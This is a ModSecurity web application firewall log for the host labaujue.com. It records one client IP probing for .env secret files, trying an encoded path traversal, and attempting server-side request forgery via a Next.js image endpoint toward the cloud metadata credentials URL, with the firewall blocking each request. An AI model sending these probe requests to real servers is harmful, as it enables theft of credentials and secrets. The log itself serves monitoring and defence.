[Tue May 12 02:07:37.590674 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
[Tue May 12 02:07:37.591046 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
[Tue May 12 02:07:37.593032 2026] [security2:error] [pid 1730207:tid 1730219] [client 93.123.109.164:7524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.production"] [unique_id "agJvSTue9Sp-pIv_Bb6GgAAAAUo"]
[Tue May 12 02:07:38.116554 2026] [security2:error] [pid 1709071:tid 1709097] [client 93.123.109.164:7584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvSrvMumyrWMfSu7qgsQAAAMo"]
[Tue May 12 02:07:38.121476 2026] [security2:error] [pid 1709071:tid 1709097] [client 93.123.109.164:7584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvSrvMumyrWMfSu7qgsQAAAMo"]
[Tue May 12 02:07:39.392810 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:7460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRlfdQaraX_prmqcWSQAAAAI"]
[Tue May 12 02:07:39.447624 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.164:7476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRrOxS7i6i_mT2NK_KwAAAE8"]
[Tue May 12 02:07:40.526531 2026] [security2:error] [pid 1695975:tid 1695981] [client 93.123.109.164:7388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRdVI9ymHBxup74-EpAAAAIM"]
[Tue May 12 02:07:42.423822 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.164:18252] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJvTlfdQaraX_prmqcWVgAAAAU"]
[Tue May 12 02:07:42.836273 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.164:18252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJvTlfdQaraX_prmqcWVgAAAAU"]
[Tue May 12 02:07:42.924786 2026] [security2:error] [pid 1730207:tid 1730225] [client 93.123.109.164:7434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvRjue9Sp-pIv_Bb6GfAAAAVA"]
[Tue May 12 02:07:44.873547 2026] [security2:error] [pid 1709071:tid 1709095] [client 93.123.109.164:7596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSbvMumyrWMfSu7qgsAAAAMg"]
[Tue May 12 02:07:47.081386 2026] [security2:error] [pid 1709071:tid 1709097] [client 93.123.109.164:7584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSrvMumyrWMfSu7qgsQAAAMo"]
[Tue May 12 02:07:47.928371 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.164:7538] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSXo6NvB9WXx5V-5yUgAAAQI"]
[Tue May 12 02:07:49.088655 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:18322] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvVXo6NvB9WXx5V-5yYgAAAQo"]
[Tue May 12 02:07:49.088787 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:18322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvVXo6NvB9WXx5V-5yYgAAAQo"]
[Tue May 12 02:07:49.109632 2026] [security2:error] [pid 1695975:tid 1695986] [client 93.123.109.164:18346] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJvVdVI9ymHBxup74-EtwAAAIg"]
[Tue May 12 02:07:49.143756 2026] [security2:error] [pid 1695975:tid 1695986] [client 93.123.109.164:18346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/_next/image/"] [unique_id "agJvVdVI9ymHBxup74-EtwAAAIg"]
[Tue May 12 02:07:49.751422 2026] [security2:error] [pid 1695975:tid 1695996] [client 93.123.109.164:7586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSdVI9ymHBxup74-EpgAAAJI"]
[Tue May 12 02:07:51.161767 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.164:7576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSTue9Sp-pIv_Bb6GfwAAAUA"]
[Tue May 12 02:07:51.170361 2026] [security2:error] [pid 1730207:tid 1730219] [client 93.123.109.164:7524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvSTue9Sp-pIv_Bb6GgAAAAUo"]
[Tue May 12 02:07:51.676448 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.164:18252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvTlfdQaraX_prmqcWVgAAAAU"]
[Tue May 12 02:07:53.075866 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:18322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvVXo6NvB9WXx5V-5yYgAAAQo"]
[Tue May 12 02:07:53.136899 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.164:17036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.local"] [unique_id "agJvWbvMumyrWMfSu7qgxAAAAM0"]
[Tue May 12 02:07:53.137104 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.164:17036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.local"] [unique_id "agJvWbvMumyrWMfSu7qgxAAAAM0"]
[Tue May 12 02:07:53.211842 2026] [security2:error] [pid 1695975:tid 1695986] [client 93.123.109.164:18346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvVdVI9ymHBxup74-EtwAAAIg"]
[Tue May 12 02:07:55.571154 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.164:17036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvWbvMumyrWMfSu7qgxAAAAM0"]
[Tue May 12 02:07:57.906934 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:17100] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvXXo6NvB9WXx5V-5yZwAAARU"]
[Tue May 12 02:07:57.907134 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:17100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvXXo6NvB9WXx5V-5yZwAAARU"]
[Tue May 12 02:07:59.321421 2026] [security2:error] [pid 1730175:tid 1730198] [client 93.123.109.164:17100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvXXo6NvB9WXx5V-5yZwAAARU"]
[Tue May 12 02:08:00.543002 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.164:17108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/.env"] [unique_id "agJvYHo6NvB9WXx5V-5yaQAAARg"], referer: https://labaujue.com/.env
[Tue May 12 02:08:00.543231 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.164:17108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/.env"] [unique_id "agJvYHo6NvB9WXx5V-5yaQAAARg"], referer: https://labaujue.com/.env
[Tue May 12 02:08:01.652993 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.164:17108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJvYHo6NvB9WXx5V-5yaQAAARg"], referer: https://labaujue.com/.env
[Tue May 12 02:08:02.699072 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.164:53978] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvYlfdQaraX_prmqcWZAAAAAw"]
[Tue May 12 02:08:02.699276 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.164:53978] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJvYlfdQaraX_prmqcWZAAAAAw"]
[Tue May 12 02:08:03.736929 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.164:53978] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvYlfdQaraX_prmqcWZAAAAAw"]
[Tue May 12 02:08:04.519739 2026] [security2:error] [pid 1695975:tid 1695979] [client 93.123.109.164:53994] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/.env"] [unique_id "agJvZNVI9ymHBxup74-EvwAAAIE"], referer: https://labaujue.com/.env
[Tue May 12 02:08:04.519915 2026] [security2:error] [pid 1695975:tid 1695979] [client 93.123.109.164:53994] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/.env"] [unique_id "agJvZNVI9ymHBxup74-EvwAAAIE"], referer: https://labaujue.com/.env
[Tue May 12 02:08:06.653238 2026] [security2:error] [pid 1695975:tid 1695979] [client 93.123.109.164:53994] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJvZNVI9ymHBxup74-EvwAAAIE"], referer: https://labaujue.com/.env
[Tue May 12 02:08:07.996296 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.164:54010] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJvZ3o6NvB9WXx5V-5ybQAAAQs"]
[Tue May 12 02:08:07.996506 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.164:54010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJvZ3o6NvB9WXx5V-5ybQAAAQs"]
